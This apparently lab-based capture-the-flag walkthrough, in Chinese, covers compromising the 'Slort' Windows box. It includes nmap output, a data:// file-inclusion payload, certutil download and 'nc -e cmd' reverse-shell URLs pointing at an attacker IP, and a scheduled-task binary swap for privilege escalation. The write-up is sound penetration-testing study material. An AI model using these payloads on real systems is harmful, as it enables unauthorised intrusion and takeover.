Slort pg walkthrough Intermediate window-编程知识

Slort pg walkthrough Intermediate window

news/2025/3/10 11:28:44/文章来源:https://www.cnblogs.com/wssw/p/18619268

nmap

┌──(root㉿kali)-[~]
└─# nmap -p- -A -sS 192.168.226.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 04:30 UTC
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 40.00% done; ETC: 04:32 (0:00:15 remaining)
Nmap scan report for 192.168.226.53
Host is up (0.071s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.45.250' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.226.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.226.53:8080/dashboard/
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=12/20%Time=6764F33A%P=x86_64-pc-linux-gnu%
SF:r(NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/20%OT=21%CT=1%CU=32487%PV=Y%DS=4%DC=T%G=Y%TM=676
OS:4F3F4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(
OS:SP=104%GCD=1%ISR=107%TI=I%CI=I%TS=U)OPS(O1=M578NW8NNS%O2=M578NW8NNS%O3=M
OS:578NW8%O4=M578NW8NNS%O5=M578NW8NNS%O6=M578NNS)WIN(W1=FFFF%W2=FFFF%W3=FFF
OS:F%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M578NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-12-20T04:34:47
|_  start_date: N/ATRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   69.88 ms 192.168.45.1
2   69.72 ms 192.168.45.254
3   70.26 ms 192.168.251.1
4   71.01 ms 192.168.226.53OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 247.05 seconds

ftp尝试匿名登录登录不了

namp扫到ftp暴露版本号看看能不能找到exp
发现了一个exp 但似乎是本地提权用的
https://github.com/NeoTheCapt/FilezillaExploit/blob/master/README.md

对smb进行探测

发现页没啥

3306 端口尝试无密码连接发现也不行

将目光投向4443和8080 端口发现连个端口搭建的站点一样

用dirsearch 浅浅扫一下看看有啥东西

发现了个phpinfo页面
我们使用users关键字定位发现了一个window靶机上存在的用户

还发现了一个站点site 访问这个路径看看是啥吧

其实看到他的跳转到的路径我们就应该很敏感的想到是否会有文件包含漏洞我直接用data伪协议试了试发现确实存在文件包含
http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20echo%20111?%3E

尝试反弹shell
http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20system(%22certutil%20-urlcache%20-split%20-f%20http://192.168.45.250:8080/nc.exe%20%20nc.exe%22)?%3E

http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20system(%22nc%20-e%20cmd%20192.168.45.250%2080%22)?%3E
反弹shell成功

接下来进入提权环节
我们会想起之前我们看到的关于ftp的本地提权exp 我们试试能不能执行进行提权

好像不太行

只能看看其他突破口了

我们发现在c盘下有个backup目录
里面有个info.txt 文件查看一下

意思是说他每五分钟运行一次 backup下的tftp.exe 文件

这样我想到了定时任务提权
如果我们对该目录有课写权限的话就可以替换该文件执行反弹shell提权了
certutil -urlcache -split -f http://192.168.45.250:8081/shell_reverse.exe shell_reverse.exe下载下来我们的反弹shell文件
move TFTP.EXE A.EXE
move shell_reverse.exe TFTP.EXE
等待执行提权成功